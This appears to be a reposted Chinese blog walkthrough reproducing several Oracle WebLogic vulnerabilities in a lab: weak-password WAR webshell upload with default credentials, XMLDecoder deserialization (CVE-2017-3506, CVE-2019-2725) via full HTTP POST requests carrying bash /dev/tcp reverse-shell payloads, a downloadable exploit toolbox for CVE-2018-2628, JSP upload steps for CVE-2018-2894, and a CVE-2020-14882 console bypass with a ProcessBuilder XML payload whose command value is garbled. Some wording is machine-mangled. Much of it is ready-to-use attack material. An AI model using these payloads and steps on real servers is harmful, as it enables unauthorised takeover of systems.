WebLogic常见的几种漏洞
背景弱⼝令GetShell漏洞描述
通过弱⼝令进⼊背景界⾯ , 上传摆设war包 , getshell
影响范围
全版本(前提背景存在弱⼝令)
漏洞复现
默认账号暗码:weblogic/Oracle@123
weblogic常⽤弱⼝令:https://cirt.net/passwords?criteria=weblogic
这⾥留意, 单个账号错误暗码5次之后就会⾃动锁定。
https://i-blog.csdnimg.cn/direct/05e793bff9c147f2b21a94c007587395.png
1.登录背景后,点击摆设,点击安装,点击上传⽂件。
https://i-blog.csdnimg.cn/direct/758c3dc5579a4e91a9249b7e14c3bc15.png
https://i-blog.csdnimg.cn/direct/5b3c11babc7c442799950af33557c091.png
https://i-blog.csdnimg.cn/direct/c7c0ab27762e48a4925c9916e6c37a47.png
https://i-blog.csdnimg.cn/direct/44aa9641566b4c62993ed17463516f4a.png
2.上传war包,jsp⽊⻢压缩成zip,修改后缀为war,上传
https://i-blog.csdnimg.cn/direct/c74e9005840241c297e714813d0d7a96.png
访问摆设好的木马文件,然后就哥斯拉毗连。
(哥斯拉可以自动生成jsp木马文件,但是生成的木马文件尽量使用哥斯拉毗连)
CVE-2017-3506
XMLDecoder反序列化漏洞
漏洞描述
Weblogic的WLS Security组件对外提供了webserver服务,其中使⽤了XMLDecoder来解析⽤户输⼊的 XML数据,在解析过程中出现反序列化漏洞,可导致任意命令执⾏。
影响版本
受影响版本:WebLogic 10.3.6.0, 12.1.3.0, 12.2.1.1, 12.2.1.2。
漏洞复现
访问以下⽬录中的⼀种,有回显如下图可以判断wls-wsat组件存在
/wls-wsat/CoordinatorPortType
/wls-wsat/RegistrationPortTypeRPC
/wls-wsat/ParticipantPortType
/wls-wsat/RegistrationRequesterPortType
/wls-wsat/CoordinatorPortType11
/wls-wsat/RegistrationPortTypeRPC11
/wls-wsat/ParticipantPortType11
/wls-wsat/RegistrationRequesterPortType11
https://i-blog.csdnimg.cn/direct/800a2a879bf040629222cf327be3e9c0.png
抓包,然后执行反弹shell的命令
POST /wls-wsat/RegistrationRequesterPortType HTTP/1.1
Host: your ip:7001
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Type: text/xml
Content-Length: 841
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java>
<object class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>bash -i >& /dev/tcp/your ip/4444 0>&1</string>
</void>
</array>
<void method="start"/>
</object>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope> https://i-blog.csdnimg.cn/direct/8c3a962616894590af9c31a9d56ec4e8.png
nc判定一个端口
https://i-blog.csdnimg.cn/direct/71d9c1eca56b414db7000086bd58c40a.png
CVE-2019-2725
漏洞描述
该漏洞存在于wls9-async组件,该组件为异步通讯服务,攻击者可以在/_async/AsyncResponseService路径下传入恶意的xml格式的数据,传入的数据在服务器端反序列化时,执行其中的恶意代码,实现远程命令执行,攻击者可以进而得到整台服务器的权限。
受影响WebLogic版本
Oracle WebLogic Server 10.*
Oracle WebLogic Server 12.1.3
漏洞复现
1、访问漏洞地址 _async/AsyncResponseService 出现 Test page字眼,证明存在漏洞
https://i-blog.csdnimg.cn/direct/eb1bf739c2c6468d86eba11e57e5a498.png
访问 http://ip:7001/_async/AsyncResponseService 使用POST方法发送特定的xml数据,可以实现各种命令执行。
POST /_async/AsyncResponseService HTTP/1.1
Host: your ip:7001
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: ADMINCONSOLESESSION=6GvQhQCSj7brk6LwTpPnt22gTpb3JxynjPGk6FW3xVwMzznJhM2W!1628766885
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Type: text/xml
Content-Length: 794
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing"
xmlns:asy="http://www.bea.com/async/AsyncResponseService">
<soapenv:Header>
<wsa:Action>xx</wsa:Action>
<wsa:RelatesTo>xx</wsa:RelatesTo>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>bash -i >& /dev/tcp/your ip/4444 0>&1</string>
</void>
</array>
<void method="start"/></void>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body>
<asy:onAsyncDelivery/>
</soapenv:Body></soapenv:Envelope>
https://i-blog.csdnimg.cn/direct/214575b8302f487481d0d92edef40f6c.png
继承nc监听端口,也可以写个木马,访问,用工具毗连
CVE-2018-2628
漏洞描述
Weblogic Server中的RMI 通信使用T3协议在Weblogic Server和别的Java程序(客户端或者别的Weblogic Server实例)之间传输数据, 服务器实例会跟踪毗连到应用程序的每个Java虚拟机(JVM)中, 并创建T3协议通信毗连, 将流量传输到Java虚拟机. T3协议在开放WebLogic控制台端口的应用上默认开启. 攻击者可以通过T3协议发送恶意的的反序列化数据, 进行反序列化, 实现对存在漏洞的weblogic组件的远程代码执行攻击。
受影响WebLogic版本
Weblogic 10.3.6.0
Weblogic 12.1.3.0
Weblogic 12.2.1.2
Weblogic 12.2.1.3
漏洞复现
访问靶场
https://i-blog.csdnimg.cn/direct/5e7cee87784240cebf8d9e4857d4a39d.png
直接使⽤利⽤⼯具(Liqun⼯具箱)
夸克网盘下载地址:https://pan.quark.cn/s/856a1c07b48b
百度网盘下载地址:https://pan.baidu.com/s/1UuhVF_o2Vxl1Za0TZlRoiw?pwd=ofox
官方地址:https://github.com/One-Fox-Security-Team/One-Fox-T00ls
https://i-blog.csdnimg.cn/direct/5e3ee31dc68c4e7396391c0cafcd6883.png
用liqun扫描上传木马之后,还是用工具毗连
CVE-2018-2894
漏洞描述
CVE-2018-2894漏洞存在于Oracle WebLogic Server的Web服务测试页面(Web Service Test Page)中。这个页面允许用户测试Web服务的功能,但在某些版本中,它包含了一个未经授权的文件上传功能。攻击者可以利用这个漏洞,上传恶意的JSP或其他可执行文件,并在服务器上执行这些文件,从而得到服务器的完全控制权。
受影响的WebLogic Server版本
包括10.3.6.0、12.1.3.0、12.2.1.2和12.2.1.3。漏洞影响的页面路径为/ws_utc/begin.do和/ws_utc/config.do。
漏洞复现
https://i-blog.csdnimg.cn/direct/6cef824549204a2dbd8cc5ec639bc0b1.png
这⾥情况背景暗码是随机得,获取暗码: docker-compose logs | grep password
https://i-blog.csdnimg.cn/direct/a10cc87e127a4a2fba09fc116441fb95.png
这里我们必要访问一个任意上传jsp文件漏洞功能点的目次位置,扫描目次的时候没有扫出来,但是你上网搜素这个CVE-2018-2894都是可以找到这个目次名字的,/ws_utc/config.do(未授权访问
https://i-blog.csdnimg.cn/direct/e00fb8d6bdc740209c20b104eb8bd7ef.png
这个版本必须开启某些功能才能有这种漏洞
第一步 点击base_domain,后点击这个高级
https://i-blog.csdnimg.cn/direct/d7563461478f4209b185c429cce8526a.png
第二步 把这个web服务勾上,然后再点击保存
https://i-blog.csdnimg.cn/direct/3bf261079f2348029520816d4da84029.png
第三步 修改ws_utc/config.do下的当前的工作目次
/u01/oracle/user_projects/domains/base_domain/tmp/WSTestPageWorkDir
改为
/u01/oracle/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/com.oracle.webservices.wls.ws-testclient-app-wls/4mcj4y/war/css
https://i-blog.csdnimg.cn/direct/614dbc3371cf4f0887025489367da1f8.png
https://i-blog.csdnimg.cn/direct/27a8bfa9706d49898f9c111748efc9a8.png
然后开始上传jsp木马文件
https://i-blog.csdnimg.cn/direct/8cd0201b6e154881b0ae5406dc2c1982.png
右键检察元素 , 然后搜索刚上传的木马 , 找到对应时间戳
访问时间戳.jsp
https://i-blog.csdnimg.cn/direct/d15838caaa4442949d0a2bb7cf1a0f12.png
利用工具毗连
CVE-2020-14882
漏洞描述
远程代码执行漏洞 (CVE-2020-14882)POC 已被公开,未经身份验证的远程攻击者可通过构造特别的 HTTP GET 哀求,结合 CVE-2020-14883 漏洞进行利用,利用此漏洞可在未经身份验证的情况下直接接受 WebLogic Server Console ,并执行任意代码,利用门槛低,危害巨大。
受影响WebLogic版本
Oracle WebLogic Server,版本10.3.6.0,12.1.3.0,12.2.1.3,12.2.1.4,14.1.1.0。
漏洞复现
直接访问 http://192.168.190.1:7001/console/images/%252E%252E%252Fconsole.portal
未授权访问背景
https://i-blog.csdnimg.cn/direct/9e9d8a632a654c2fb3ebd8666f65444f.png
抓包然后修改post,写jsp一句话木马反弹shell
<?xml version="1.0" encoding="UTF-8" ?>
<beans xmlns="http://www.springframework.org/schema/beans"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://www.springframework.org/schema/beans
http://www.springframework.org/schema/beans/spring-beans.xsd">
<bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
<constructor-arg>
<list>
<value>bash</value>
<value>-c</value>
<value><!]></value>
</list>
</constructor-arg>
</bean>
</beans>
该漏洞利⽤的缺点是,它要求 Weblogic 服务器能够访问恶意 XML。
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。
页:
[1]